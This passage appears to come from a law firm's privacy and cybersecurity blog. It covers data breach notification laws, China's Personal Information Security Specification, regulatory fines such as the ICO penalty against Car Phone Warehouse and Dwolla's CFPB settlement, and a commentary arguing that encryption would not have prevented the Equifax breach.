“Let me be clear: the FBI supports information security measures, including strong encryption,” Fry said. “Actually, the FBI is on the front line fighting cyber crime and economic espionage. But information security programs need to be thoughtfully designed so they don’t undermine the lawful tools we need to keep the American people safe.”

However, Ars Technica noted that a consensus of technical experts has said that what the FBI has asked for is impossible.

In addition, the Electronic Frontier Foundation obtained documents via a Freedom of Information Act lawsuit that revealed the FBI and Best Buy’s Geek Squad have been working together for decades. In some cases Geek Squad techs were paid as much as $1,000 to be informants, which the EFF argued was a violation of Fourth Amendment rights as the computer searches were not authorized by their owners.

Finally, the Alabama senate unanimously passed the Alabama Breach Notification Act, and the bill will now move to the house.

“Alabama is one of two states that doesn’t have a data breach notification law,” said state Senator Arthur Orr, who sponsored Alabama’s bill. “In the case of a breach, businesses and organizations, including state government, are under no obligation to tell a person their information may have been compromised.”

With both Alabama and South Dakota recently introducing data breach notification legislation, every resident of the U.S. may soon be protected by a state breach notification law.

China Releases National Standard on Personal Information Security

On January 25, 2018, the Standardization Administration of China published the full text of the Information Security Technology – Personal Information Security Specification (the “Specification”). The Specification will come into effect on May 1, 2018. The Specification is voluntary, but could become influential within China because it establishes benchmarks for the processing of personal information by a wide variety of entities and organizations. In effect, the Specification constitutes a best practices guide for the collection, retention, use, sharing and transfer of personal information, and for the handling of related information security incidents.

The Specification divides personal information into two categories: personal information and sensitive personal information. “Sensitive personal information” includes personal information such as financial information, identifying information (such as an ID card, social insurance card, passport or driver’s license) and biological identifying information. The Specification provides specific requirements for the collection and use of sensitive personal information, as well as a sample functional interface with a data subject which could be incorporated by an enterprise in its products or services for the collection of sensitive personal information. The sample functional interface is a template for an interactive web page or software that is designed in accordance with the Specification, shows information such as the purpose, scope and transfer of personal information, and contains a checkbox to obtain consent.

The Specification reiterates the applicability of the principles of legitimacy and minimization, and the obligation to obtain the consent of a data subject, when collecting personal information, as well as the requirement to formulate and publish a privacy policy. These appear in earlier privacy-related laws and regulations, such as the Cybersecurity Law. In addition, the Specification provides several exceptions to the consent requirement, including when the collection and use of personal information is (1) directly related to national security, public security, a matter of material public interest, the investigation or trial of a crime or the enforcement of a judgement, or (2) requested by a data subject and is necessary for the execution and performance of a contract. The Specification also includes a template privacy policy. When collecting personal information indirectly from a third party (rather than directly from the data subject), an entity must require the party providing the information to explain the source by which the personal information was originally obtained, and to check whether that party obtained the consent of the data subject for the sharing, transfer or disclosure of the personal information.

According to the Specification, personal information must be retained for only the minimum extent necessary, and must be deleted or anonymized after the expiration of the retention period. Encryption measures must be adopted whenever sensitive personal information is retained. When a personal information controller ceases to provide a product or service, it must inform the relevant data subjects and must delete or anonymize all personal information retained in relation to the data subjects.

When an enterprise uses personal information, it must adopt controls on access and restrictions on the display of the information. The use of personal information must not go beyond the purpose stated when collecting it. Personal data subjects have the right to request correction, deletion and copies of personal information that pertains to them, as well as the right to withdraw their consent to the collection and use of the personal information. An enterprise must respond to the request of a data subject for correction, deletion or copying once it has verified his or her identity.

When an enterprise engages a third party to process personal information, it must conduct a security assessment to ensure that the processor possesses sufficient security capabilities. The enterprise must also require the third party to safeguard the personal information, and must also supervise the third party’s processing of the personal information. If an enterprise needs to share or transfer personal information, it must conduct a security assessment and adopt security measures, inform the data subjects of the purpose of the sharing or transfer and of the categories of recipients, and obtain the consent of the data subjects.

An enterprise must formulate a contingency plan for security incidents that involve personal information and conduct emergency drills at least once a year. In the event of an actual data breach incident, the enterprise must inform the affected data subjects by email, letter, telephone or other reasonable and efficient method. The notice must include information such as the substance of the incident and its impact, remedial measures that have been taken or will be taken, suggestions for the data subjects on how to reduce risks, remedial measures made available to data subjects, and the responsible person and his or her contact information.

The Specification requires entities to clarify which of their departments and staff would be responsible for the protection of personal information, and to establish a system to evaluate impacts on the security of personal information. Enterprises must also implement staff training and audit the security measures which they have adopted to protect personal information.

UK ICO Issues Unprecedented Fine Against Mobile Phone Retailer for Lax Security

On January 8, 2017, the UK Information Commissioner (“ICO”) issued an unprecedented monetary penalty of £400,000 against British mobile phone retailer, The Car Phone Warehouse Limited. Following an attack on their system in 2015, the ICO found that the company had failed to take adequate steps to protect the personal data it held on its system.

Between July and August 2015, the system hosting the company’s internal and external websites, which included personal data (including payment card data) of over 3,348,000 customers and 1,000 employees, was subject to an external cyber attack. In its decision, the ICO meticulously detailed the chronology of events and technical failures that led to the breach. The ICO found that the attacker entered and took hold of the system quickly and easily due to the company’s security deficiencies, which included:

  • the system’s software was years out of date;
  • software patching was seriously inadequate and no measures were in place to check whether the software updates or patches were implemented in accordance with the company’s policy;
  • the company did not have measures in place to control access credentials;
  • adequate vulnerability scanning and penetration testing measures were not in place at the time;
  • the company had no Web Application Firewall for monitoring traffic to and from its web applications, contrary to accepted security standards;
  • the system’s servers did not have antivirus technology, which was contrary to the company’s policy and accepted security standards;
  • the operating system on the servers all had the same password shared by more than 30 employees;
  • personal data was retained without good reason and inadequate measures were in place to identify and purge historic data; and
  • the encryption keys for historical transactions were not stored safely.

The ICO concluded that these facts constituted a multi-faceted violation of the Data Protection Principle 7 included in the Data Protection Act of 1998, which provides that appropriate technical and organizational measures should be taken against unauthorized or unlawful processing of personal data and against accidental loss or destruction of, or damage to, personal data.

This decision sets the tone for companies at the dawn of the entry into force of the GDPR. The ICO, in its public announcement of the decision, emphasized the importance of the Privacy by Design principle included in the GDPR, which requires companies to ensure that strong IT governance and information security measures are in place, tested and refreshed to comply with the provisions of the law.

Encryption would NOT have saved Equifax

I read a few articles this week suggesting that the big question for Equifax is whether or not their data was encrypted. The State of Massachusetts, speaking about the lawsuit it filed, said that Equifax "didn't put in safeguards like encryption that would have protected the data." Unfortunately, encryption, as it's most often used in these scenarios, would not have actually prevented the exposure of this data. This breach will have an enormous impact, so we should be careful to get the facts right and provide as much education as possible to law makers and really to anyone else affected.

We know that the attack took advantage of a flaw in Apache Struts (that should have been patched). Struts is a framework for building applications. It lives at the application tier. The data, obviously, resides at the data tier. Once the application was compromised, it really doesn't matter if the data was encrypted because the application is allowed to access (and therefore to decrypt) the data.

I won't get into all the various encryption techniques that are possible but there are two common types of data encryption for these types of applications. There's encryption of data in motion so that nobody can eavesdrop on the conversation as data moves between tiers or travels to the end users. And there's encryption of data at rest that protects data as it's stored on disk so that nobody can pick up the physical disk (or the data file, depending on how the encryption is applied) and access the data. Once the application is authenticated against the database and runs a query against the data, it is able to access, view, and act upon the data even if the data was encrypted while at rest.

Note that there is a commonly-applied technique that applies at-rest encryption at the application tier. I don't want to confuse the conversation with too much detail, but it usually involves inserting some code into the application to encrypt/decrypt. I suspect that if the application is compromised then app-tier encryption would have been equally unhelpful.

The bottom line here is that information security requires a broad, layered defense strategy. There are numerous types of attacks. A strong security program addresses as many potential attack vectors as possible within reason. (My use of "within reason" is a whole other conversation. Security strategies should evaluate risk in terms of likelihood of an attack and the damage that could be caused.) I already wrote about a layered approach to data protection within the database tier. But that same approach of layering security applies to application security (and information security in general). You have to govern the access controls, ensure strong enough authentication, understand user context, identify anomalous behavior, encrypt data, and, of course, patch your software and maintain your infrastructure. This isn't a scientific analysis. I'm just saying that encryption isn't a panacea and probably wouldn't have helped at all in this case.

Equifax says that their "security organization was aware of this vulnerability at that time, and took efforts to identify and to patch any vulnerable systems in the company's IT infrastructure." Clearly, humans need to rely on technology to help identify what systems exist in the environment, what software is installed, which versions, etc. I have no idea what tools Equifax might have used to scan their environment. Maybe the tool failed to find this install. But their use of "at that time" bothers me too. We can't rely on point-in-time assessments. We need continuous evaluations on a never ending cycle. We need better intelligence around our IT infrastructures. And as more workloads move to cloud, we need a unified approach to IT configuration compliance that works across company data centers and multi-cloud environments.

100% protection may be impossible. The best we can do is weigh the risks and apply as much security as possible to mitigate those risks. We should also all be moving to a continuous compliance model where we are actively assessing and reassessing security in real time. And again... layer, layer, layer.

FTC Posts Fifth Blog in Its “Stick with Security” Series

On August 18, 2017, the FTC published the fifth blog post in its “Stick with Security” series. As we previously reported, the FTC will publish an entry every Friday for the next few months focusing on each of the 10 principles outlined in its Start with Security Guide for Businesses. This week’s post, entitled Stick with Security: Store sensitive personal information securely and protect it during transmission, outlines steps businesses can take to secure sensitive data, including when it is in transit.

The FTC’s reasonable protections include:

  • Keeping Sensitive Information Secure Throughout its Lifecycle: This involves knowing how sensitive data enters the business, moves within it and leaves the business. Once a business understands this roadmap, it is easier to implement security at every interval of data movement.
  • Use Industry-Tested and Accepted Methods: To ensure security, businesses should adopt industry-tested methods reflective of expert wisdom in the field. For example, a business that adopts tried and true encryption methods accepted by industry, and incorporates these methods into product development, acts more prudently than a business that uses its own proprietary method to obfuscate data.
  • Ensure Proper Configuration: When businesses choose to use strong encryption, they need to ensure they have configured it correctly. For example, a business using Transport Layer Security (“TLS”) must ensure the process to validate the TLS certificate is enabled. Following default recommendations likely will result in the correct set up, but businesses that change settings must ensure that they have the correct configuration.

The FTC’s next blog post, to be published on Friday, August 25, will focus on segmenting networks and monitoring who is trying to get in and out.

To read our previous posts documenting the series, see FTC Posts Fourth Blog in its “Stick with Security” Series, FTC Posts Third Blog in its “Stick with Security” Series and FTC Posts Second Blog in its “Stick with Security” Series.

Colorado Publishes Cybersecurity Regulations for Financial Institutions

Recently, the Colorado Division of Securities (the “Division”) published cybersecurity regulations for broker-dealers and investment advisers regulated by the Division. Colorado’s cybersecurity regulations follow similar regulations enacted in New York that apply to certain state-regulated financial institutions.

The regulations obligate covered broker-dealers and investment advisers to establish and maintain written cybersecurity procedures designed to protect “confidential personal information” which is defined to include a Colorado resident’s first name or first initial and last name, plus (1) Social Security number; (2) driver’s license number or identification card number; (3) account number or credit or debit card number, in combination with any required security code, access code or password that would permit access to a resident’s financial account; (4) digitized or other electronic signature or (5) user name, unique identifier or electronic mail address in combination with a password, access code security question or other authentication information that would permit access to an online account.

The cybersecurity procedures must include:

  • an annual assessment by the firm or an agent of the firm of the potential risks and vulnerabilities to the confidentiality, integrity and availability of confidential personal information;
  • the use of secure email for email containing confidential personal information, including use of encryption and digital signatures;
  • authentication practices for employee access to electronic communications, databases and media;
  • procedures for authenticating client instructions received via electronic communication; and
  • disclosure to clients of the risks of using electronic communications.

In determining whether a firm’s cybersecurity procedures are reasonably designed, the Division may consider the firm’s size, relationships with third parties and cybersecurity policies and procedures. The Division may also consider the firm’s (1) authentication practices, (2) use of electronic communications, (3) use of automatic locking mechanisms for devices that have access to confidential personal information and (4) process for reporting lost or stolen devices.

The Colorado Secretary of State will set an effective date for the Colorado regulations after the Colorado Attorney General’s office issues an opinion on the regulations.

New York AG Settles with Wireless Lock Maker Over Security Flaws

On May 22, 2017, New York Attorney General Eric T. Schneiderman announced that the AG’s office has reached a settlement (the “Settlement”) with Safetech Products LLC (“Safetech”) regarding the company’s sale of insecure Bluetooth-enabled wireless doors and padlocks. In a press release, Schneiderman indicated that this “marks the first time an attorneys general’s office has taken legal action against a wireless security company for failing to protect their [customers’] personal and private information.”

The Settlement stems from Safetech’s representations that its products would allow users the ability to protect personal belongings inside their homes by turning doors and closets into secure areas. In August 2016, however, a team of independent security researchers discovered that Safetech’s Bluetooth-enabled locks left consumers susceptible to hacking and theft because the locks failed to secure passwords and other security information required for operation. Specifically, the researchers found that Safetech’s locks transmitted passwords between the locks and users’ smartphones in plain text and without encryption, allowing potential perpetrators to intercept the passwords and open the locks. The researchers also discovered that the locks contained weak and insecure default passwords that could easily be solved or discovered through brute force attacks of automated software used to generate a large number of consecutive guesses.

The Settlement requires Safetech to encrypt all passwords, electronic keys or other security credentials in their locks and other Bluetooth-enabled devices, as well as prompt users to change the default password upon the users’ initial setup of wireless communication. The Settlement also requires Safetech to establish and implement a written comprehensive security program reasonably designed to (1) address security risks related to the development and management of new and existing devices that use security information, and (2) protect the privacy, security, confidentiality and integrity of security information, including:

  • designating an employee or employees to coordinate and be accountable for the security program;
  • identifying material internal and external risks to (1) the security of the devices that could result in unauthorized access to or unauthorized modification of the device and (2) the privacy, security, confidentiality and integrity of security information;
  • designing and implementing reasonable safeguards to control the risks identified through the risk assessment;
  • regularly testing or monitoring the effectiveness of the safeguards’ key controls, systems and procedures, including reasonable and appropriate security testing techniques such as vulnerability and penetration testing, security architecture reviews and code reviews;
  • developing and using reasonable steps to select and retain service providers capable of maintaining security practices consistent with the Settlement, and contractually requiring service providers to implement and maintain appropriate safeguards consistent with the Settlement; and
  • evaluating and adjusting Safetech’s security program in light of the results of the testing and monitoring required by the Settlement.

New Mexico Enacts Data Breach Notification Law

On April 6, 2017, New Mexico became the 48th state to enact a data breach notification law, leaving Alabama and South Dakota as the two remaining states without such requirements. The Data Breach Notification Act (H.B. 15) goes into effect on June 16, 2017.

Key Provisions of New Mexico’s Data Breach Notification Act:

  • The definition of “personal identifying information” includes biometric data, defined as an individual’s “fingerprints, voice print, iris or retina patterns, facial characteristics or hand geometry that is used to uniquely and durably authenticate an individual’s identity when the individual accesses a physical location, device, system or account.”
  • The law applies to unencrypted computerized data or encrypted computerized data when the encryption key or code is also compromised.
  • Notice to the New Mexico Office of the Attorney General and the major consumer reporting agencies is required if more than 1,000 New Mexico residents are notified.
  • Notice must be made to New Mexico residents (and the Attorney General and Consumer Reporting agencies if over 1,000 residents are notified) within 45 calendar days of discovery of a security breach.
    • Third-party service providers are also required to notify the data owner or licensor within 45 days of discovery of a data breach.
  • Notification is not required if, after an appropriate investigation, it is determined that the security breach does not give rise to a significant risk of identity theft or fraud.
  • Entities that are subject to the Gramm-Leach Bliley Act or HIPAA are exempt from the statute.
  • The law also contains a data disposal provision that requires data owners or licensors to shred, erase or otherwise make unreadable personal identifying information contained in records when it is no longer “reasonably needed” for business purposes.
  • In addition, the law requires data owners and licensors to implement and maintain reasonable security procedures and practices designed to protect the personal identifying information from unauthorized access, destruction, use, modification or disclosure.
    • Contracts with third-party service providers must require that the service provider implement and maintain such security procedures and practices.

Virginia Adds State Income Tax Provision to Data Breach Notification Law

Recently, Virginia passed an amendment to its data breach notification law that adds state income tax information to the types of data that require notification to the Virginia Office of the Attorney General in the event of unauthorized access and acquisition of such data. Under the amended law, an employer or payroll service provider must notify the Virginia Office of the Attorney General after the discovery or notification of unauthorized access and acquisition of unencrypted and unredacted computerized data containing a Virginia resident’s taxpayer identification number in combination with the income tax withheld for that taxpayer. 

The amendment contains a harm threshold, requiring notification when such unauthorized access and acquisition compromises the confidentiality of the data and causes, or reasonably will cause, identity theft or fraud. For employers, the amendment applies only to the employer’s Virginia employees, and not to information regarding the employer’s customers or non-employees. Notification to the Virginia Office of the Attorney General must be made “without unreasonable delay” and must include the name and federal employer identification number of the employer that may be affected by the incident. The amendment requires notification only to the Virginia Office of the Attorney General, and not affected individuals. The amendment takes effect on July 1, 2017.

Health Insurer Reaches Privacy Settlement with New Jersey Division of Consumer Affairs

On February 17, 2017, Horizon Blue Cross Blue Shield of New Jersey (“Horizon”) agreed to pay $1.1 million as part of a settlement with the New Jersey Division of Consumer Affairs (the “Division”) regarding allegations that Horizon did not adequately protect the privacy of nearly 690,000 policyholders.

The settlement stemmed from the theft of two laptops stolen from Horizon headquarters in November 2013, when personnel from outside vendors performing renovations and moving services at Horizon’s Newark headquarters had unsupervised access to the area where company laptops were stored. The stolen laptops contained policyholder electronic Protected Health Information (“ePHI”), including names, addresses, birth dates, insurance identifications and, in some cases, Social Security numbers and clinical data. The policyholder data was password protected but not encrypted, in violation of HIPAA and HITECH.

An investigation by the Division found that more than 100 company-owned laptops assigned to Horizon employees were not encrypted, in violation of HIPAA and HITECH, as well as a company policy requiring company-issued laptops to contain encryption software. The Division found that most of these unencrypted laptops were obtained outside Horizon’s normal procurement process, and therefore the IT department failed to adequately monitor, service or install security software required by company policy on those laptops. The Division further found that the stolen laptops were issued to employees who were not required to store ePHI on their laptops, in violation of another company policy restricting ePHI access to employees with a “need to know.” The relevant company policies were instituted after an unrelated 2008 laptop theft from an employee’s car.

Under the terms of the settlement, in addition to the $1.1 million monetary settlement, which breaks down into a civil penalty, a reimbursement of the state’s attorneys’ fees and investigative costs, and promotion of consumer privacy programs, Horizon must take corrective steps to address its data security practices with respect to ePHI. In particular, Horizon must hire a third-party professional to assess security risks associated with its storage, transmission and receipt and submit a report of those findings to the Division within 180 days of the settlement, and every year thereafter for two years. $150,000 in civil penalties are suspended pending Horizon’s compliance with the terms of the settlement.

OMB Publishes Memorandum on Responding to Data Breaches

On January 3, 2017, the Office of Management and Budget (“OMB”) issued a memorandum (the “Breach Memorandum”) advising federal agencies on how to prepare for and respond to a breach of personally identifiable information (“PII”). The Breach Memorandum, which is intended for each agency’s Senior Agency Official for Privacy (“SAOP”), updates OMB’s breach notification policies and guidelines in accordance with the Federal Information Security Modernization Act of 2014 (“FISMA”).

The Breach Memorandum sets the stage by discussing the evolving threat and risk landscape, noting that there has been a 27 percent increase in the number of incidents reported by federal agencies from 2013 to 2015. The Breach Memorandum defines a “breach,” which is a type of incident, as “[t]he loss of control, compromise, unauthorized disclosure, unauthorized acquisition, or any similar occurrence where (1) a person other than an authorized user accesses or potentially accesses personally identifiable information or (2) an authorized user accesses or potentially accesses personally identifiable information for an other than authorized purpose.” This definition goes beyond the definition contained in many state breach notification laws by including incidents of “potential” access to PII.

The Breach Memorandum next notes the importance of breach response and awareness training, and emphasizes key provisions to include in agency contracts that obligate contractors to (1) encrypt PII in accordance with OMB and agency-specific guidelines, (2) report breaches to the relevant agency as soon as possible and (3) cooperate with any forensic investigation and analysis. With respect to breach reporting, the Breach Memorandum encourages each agency to set up a simple email address, such as breach@[agency].gov, to which individuals may report suspected or confirmed breaches.

The Breach Memorandum then focuses on breach response plans. It requires each SAOP to develop and implement a breach response plan that:

  • establishes a Breach Response Team at each agency to be headed by the SAOP;
  • identifies applicable privacy compliance documentation such as system of record notices and privacy impact assessments;
  • facilitates information sharing within the agency or between agencies for the purposes of reconciling or eliminating duplicate records, identifying potentially affected individuals or obtaining individuals’ contact information;
  • analyzes reporting requirements to determine whether a specific breach requires the agency to notify law enforcement or Congress;
  • assesses the risk of harm to potentially affected individuals by considering factors such as the PII at issue, the likelihood of access to and use of the information, and the relevant actors involved;
  • mitigates the risk of harm to potentially affected individuals such as by purchasing identify theft protection services for potentially affected individuals; and
  • notifies individuals affected by a breach, using the most appropriate method of notification.

Following a breach, agencies must track and document the response to each breach via a standard internal reporting template and identify any lessons learned from a breach. In addition, the SAOP and the agency must annually: (1) conduct a tabletop exercise, (2) review the breach response plan and consider potential updates and (3) submit an annual FISMA report on the adequacy of the agency’s information security policies and procedures.

The Breach Memorandum contains several appendices that can be used as resources for federal agencies, including a model breach reporting template, examples of services an agency may provide to affected individuals and a list of federal laws, executive orders, memoranda and directives that address data breaches.

FINRA Fines Brokerage Firm $650,000 After Cyber Attack

On November 14, 2016, Lincoln Financial Securities Corp. (“LFS”), a subsidiary of Lincoln Financial Group, entered into a settlement (the “Settlement”) with the Financial Industry Regulatory Authority (“FINRA”), requiring LFS to pay a $650,000 fine and implement stronger cybersecurity protocols following a 2012 hack into its cloud-based server.

In 2012, hackers with foreign IP addresses accessed LFS’s cloud server and stole confidential records of approximately 5,400 customers. The stolen records included account applications and other brokerage records containing customers’ nonpublic personal information, including Social Security numbers. LFS timely notified affected individuals and FINRA about the breach and, to date, there is no evidence of any misuse of customer information resulting from the theft. In the Settlement, however, FINRA alleged that LFS failed to implement and maintain adequate cybersecurity procedures, including written supervisory procedures, designed to protect confidential customer information stored on electronic systems in violation of FINRA Rules 3110 and 2010. FINRA alleged that when LFS began storing records on cloud-based servers in 2011, LFS failed to ensure that the third-party vendor retained to configure the cloud system properly installed antivirus software or data encryption for the confidential information, and that this failure led to the 2012 hack.

Under the terms of the Settlement, LFS will pay a $650,000 penalty to FINRA. In addition, LFS is required to review its written supervisory procedures and security systems and implement all necessary changes to enhance security. LFS previously was fined $450,000 by FINRA in 2011 for failing to establish adequate procedures to protect confidential customer information stored on its web-based electronic portfolio management system.

Korean Privacy Law Updated

On September 22, 2016, Korean law firm Bae, Kim & Lee LLC released a Legal Update outlining amendments to Korea’s Personal Information Protection Act (“PIPA”) and the Act on the Promotion of IT Network Use and Information Protection (“IT Network Act”).

The amendments to PIPA include:

  • notification requirements for third-party transfers; and
  • an obligation to submit to regular inspection by MOI.

Effective September 30, 2016, “companies that either process sensitive information or unique identifying information of 50,000 data subjects or more, or process personal information of 1 million data subjects or more should be prepared to implement the obligation to notify data subjects if personal information has been obtained indirectly from third parties [and] comply with MOI’s request for document review in connection with MOI’s regular inspection on the company’s security measures.”

Amendments to the IT Network Act include clarification of statutory retention period applicable to unused data. This amendments addresses “the issue of how the IT service providers should handle personal data whose “statutory retention period” has expired, but which data the IT service provider has a legal obligation to retain pursuant to other laws.”

Read Bae, Kim & Lee’s Legal Update.

FTC Orders Mobile Device Manufacturers to Provide Information about Security Updates for Study

On May 9, 2016, the Federal Trade Commission announced it had issued Orders to File a Special Report (“Orders”) to eight mobile device manufacturers requiring them to, for purposes of the FTC’s ongoing study of the mobile ecosystem, provide the FTC with “information about how [the companies] issue security updates to address vulnerabilities in smartphones, tablets, and other mobile devices.” The FTC’s authority to issue such Orders comes from Section 6(b) of the FTC Act.

The following companies are receiving the orders:

  • Apple, Inc.;
  • Blackberry Corp.;
  • Google, Inc.;
  • HTC America, Inc.;
  • LG Electronics USA, Inc.;
  • Microsoft Corp.;
  • Motorola Mobility, LLC; and
  • Samsung Electronics America, Inc.

Among other details, the Orders require the relevant companies to provide information regarding:

  • factors the companies consider in deciding whether to patch a vulnerability on a particular mobile device;
  • any written policies, contracts, testing or certification documentation the companies maintain regarding mobile device security;
  • disclosures the companies have made to consumers regarding mobile device security updates;
  • (1) detailed data on the specific mobile devices the companies have offered for sale to consumers since August 2013; (2) the vulnerabilities that have affected those devices; and (3) whether and when the companies patched such vulnerabilities.

The companies must file their responses within 45 days from the date of service of the Orders.

Amended Nebraska Data Breach Notification Law Adds Regulator Notification Requirement

On April 13, 2016, Nebraska Governor Pete Ricketts signed into law LB 835 (the “Bill”), which among other things, adds a regulator notification requirement and broadens the definition of “personal information” in the state’s data breach notification statute, Neb. Rev. Stat. §§ 87-802 to 87-804. The amendments take effect on July 20, 2016.

Specifically, the Bill:

  • requires entities to notify the Nebraska Attorney General in the event of a data breach, and no later than notice is provided to Nebraska residents;
  •  adds to the definition of “personal information” a user name or email address, in combination with a password or security question and answer, that would permit access to an online account; and
  • states that data is not considered “encrypted” for purposes of avoiding notification obligations if the confidential process or key was or is reasonably believed to have been acquired as a result of the breach.

Lisa Sotto Featured in SC Magazine Article – Ready to Rumble: Apple v. FBI

In a recent article published by SC Magazine, Lisa Sotto, head of Hunton & Williams LLP’s Global Privacy and Cybersecurity practice, provides commentary on the recent case, Apple v. FBI. The article analyzes privacy versus security, and Sotto tells SC Magazine, “[the case] should never have escalated to this, privacy should have been addressed” at the onset of the investigation. Sotto says the government should have “worked with tech companies to craft policies and processes” before an issue of this magnitude arose. The article provides details on the case and discusses differentiators that set the case apart from similar issues in the past, and also provides insight into legislation that could regulate privacy and security matters in the future. Many believe Congress should step in, including Sotto who says, “The courts can’t keep doing it on a piecemeal basis.”

Read the full article.

Draft E-Commerce Standards Published for Comment in China

On March 22, 2016, the Ministry of Commerce of the People’s Republic of China published drafts of its proposed (1) Specifications for Business Services in Mobile E-commerce (“Mobile E-commerce Specifications”) and (2) Specifications for Business Services in Cross-border E-commerce (“Cross-border E-commerce Specifications”). A public comment period on these drafts is now open. Comments will be accepted until May 31, 2016.

The Mobile E-commerce Specifications contain several provisions that require service providers in the e-commerce sector to take measures to ensure the security of operational data and service platforms. According to the Mobile E-commerce Specifications, “service providers in the electronic commerce sector” refers to platform service providers who provide e-commerce transaction platforms that are accessed over mobile devices. The Mobile E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics services providers, payment service providers and purchasers via mobile devices.

Under the draft specifications, platform service providers would be responsible for the handling of transaction information and relevant personal information from online sellers. The authorization of the data subject would be required before collecting and processing personal information. The collection of transaction information would have to be authorized by the parties to the transaction.

In addition, personal and transaction information may not be directly used for commercial purposes unless it has been desensitized. Platform service providers could, with the consent of an online seller, transfer, copy, transmit or process desensitized data from the online seller. Personal information would have to be encrypted before being transferred online. Also, a record must be maintained of any disclosures of personal and transaction data to administrative authorities, enforcement authorities or the judiciary.

Platform service providers also would be responsible for the management of the platform’s data security. Personal data from online sellers should be isolated on the platform, and only the data owner should have access to the data. Modifications to original data stored on the platform should be authorized only by the data subject. Platform service providers would be responsible for protecting personal data from online sellers from loss.

The Cross-border E-commerce Specifications would impose similar requirements and obligations in a separate, but closely related, category and would apply the same obligations under the Mobile E-commerce Specifications to e-commerce service providers who provide e-commerce transaction platforms for the purchase and sale of cross-border goods. The Cross-border E-commerce Specifications apply whenever these platforms are accessed or used by online sellers, logistics providers, payment service providers and purchasers of cross-border goods.

Consumer Financial Protection Bureau Imposes First Ever Data Security Fine

On March 2, 2016, the Consumer Financial Protection Bureau (“CFPB”) reached a settlement with Dwolla, Inc. (“Dwolla”), an online payment system company, to resolve claims that the company made false representations regarding its data security practices in violation of the Consumer Financial Protection Act. Among other things, the consent order imposes a $100,000 fine on Dwolla. This marks the first data security-related fine imposed by the CFPB.

In the consent order, the CFPB alleges that Dwolla mispresented that it “employ[ed] reasonable and appropriate measures to protect data obtained from consumers from unauthorized access,” and that its network and transactions were “safe,” “secure” and compliant with the standards set forth by the PCI Security Standards Council. Specifically, the CFPB found that Dwolla failed to:

  • adopt and implement data security policies and procedures reasonable and appropriate for the organization;
  • use appropriate measures to identify reasonably foreseeable security risks;
  • ensure that employees who have access to or handle consumer information received adequate training and guidance about security risks;
  • use encryption technologies to properly safeguard sensitive consumer information; and
  • practice secure software development, particularly with regard to consumer-facing applications developed on an affiliated website, Dwollalabs.com.

In addition to the $100,000 fine, Dwolla was ordered, for the next five years, to adopt and implement reasonable and appropriate data security measures to protect consumers’ personal information on its networks and applications, including:

  • implementing a comprehensive data security plan reasonably designed to protect the confidentiality, integrity and availability of sensitive consumer information;
  • conducting semiannual data security risk assessments;
  • conducting regular, mandatory employee training on (1) data security policies and procedures, (2) the safe handling of consumer’s sensitive personal information, and (3) secure software design, development and testing;
  • obtaining an annual data security audit from an independent, qualified third party, using procedures and standards generally accepted in the profession; and
  • implementing reasonable procedures for the selection and retention of service providers capable of maintaining security practices consistent with the consent order, and requiring service providers by contract to implement and maintain appropriate safeguards.

California Attorney General Releases Report Defining “Reasonable” Data Security

On February 16, 2016, California Attorney General Kamala D. Harris released the California Data Breach Report 2012-2015 (the “Report”) which, among other things, provides (1) an overview of businesses’ responsibilities regarding protecting personal information and reporting data breaches and (2) a series of recommendations for businesses and state policy makers to follow to help safeguard personal information. Importantly, the Report states that, “[t]he failure to implement all the [Center for Internet Security’s Critical Security] Controls that apply to an organization’s environment constitutes a lack of reasonable security” under California’s information security statute. Cal. Civ. Code § 1798.81.5(b) requires that “[a] business that owns, licenses, or maintains personal information about a California resident shall implement and maintain reasonable security procedures and practices appropriate to the nature of the information, to protect the personal information from unauthorized access, destruction, use, modification, or disclosure.” The Center for Internet Security’s Critical Security Controls are a set of 20 cybersecurity defensive measures meant to “detect, prevent, respond to, and mitigate damage from cyber attacks.”

The Report also provides the following recommendations:

  • Organizations should make multi-factor authentication available on consumer-facing online accounts that contain sensitive personal information.
  • Organizations, particularly in the health care industry, should consistently use strong encryption to protect personal information on laptops and other portable devices, and should consider it for desktop computers.
  • Organizations should encourage individuals affected by a breach of Social Security numbers or driver’s license numbers to place a fraud alert on their credit files and make this option very prominent in their breach notices.
  • State policy makers should collaborate to harmonize state breach laws on some key dimensions. Such an effort could reduce the compliance burden for companies, while preserving innovation, maintaining consumer protections and retaining jurisdictional expertise.

FTC Settles with Dental Practice Software Provider over Charges of Misleading Consumers with Respect to Data Encryption

On January 5, 2016, the Federal Trade Commission announced that dental office management software provider, Henry Schein Practice Solutions, Inc. (“Schein”), agreed to settle FTC charges that accused the company of falsely advertising the level of encryption it used to protect patient data. The proposed Agreement Containing Consent Order (“Consent Order”) stems from an FTC complaint that alleged the company engaged in unfair or deceptive acts or practices by falsely representing that the Dentrix G5 software used industry-standard encryption and helped dentists protect patient data in accordance with the Health Insurance Portability and Accountability Act of 1996 (“HIPAA”).

Dentrix G5 is a type of software that enables dentists to perform office tasks such as entering patient data and sending appointment reminders. The FTC asserted that, in 2012, the Dentrix G5 software incorporated a third party database engine that included a form of data protection that Schein advertised as “encryption.” According to the complaint, as early as November 2010, the database engine vendor notified Schein that the form of data protection used in Dentrix G5 was a “proprietary algorithm that had not been tested publicly, and was less secure and more vulnerable than widely-used, industry-standard encryption algorithms, such as Advanced Encryption Standard (“AES”) encryption.”

The FTC alleged that Schein was aware that the Department of Health and Human Services (“HHS”) directs health care providers (including most dentists) to protect patient data in accordance with guidance promulgated by the National Institute of Standards and Technology (“NIST”), which recommends AES encryption.  Similarly, HHS’ Breach Notification rule requires covered entities responding to a data breach to consider whether the compromised data was encrypted in accordance with the NIST Special Publication 800-111.

According to the complaint, the United States Computer Emergency Readiness Team issued a vulnerability note in June 2013 indicating that the form of data protection used in Dentrix G5 software was a “weak obfuscation algorithm.” In response, the database engine vendor agreed to rebrand the data protection method as “Data Camouflage” instead of “encryption.” Nevertheless, despite the alert and rebranding, Schein continued to distribute marketing materials stating that Dentrix G5 “encrypts” patient data and offers “encryption.”

The proposed Consent Order will prohibit Schein from misrepresenting whether, and to what extent, the product or service offers industry-standard encryption, helps customers meet regulatory obligations, or maintains the privacy, security, confidentiality and integrity of personal information. The Consent Order will require Schein to notify affected customers that Dentrix G5 uses a less complex encryption algorithm than AES, and provide the FTC with ongoing reports on the notification program. In addition, Schein will be required to pay $250,000 to the FTC.

China Enacts Administrative Measures for Online Payment Businesses

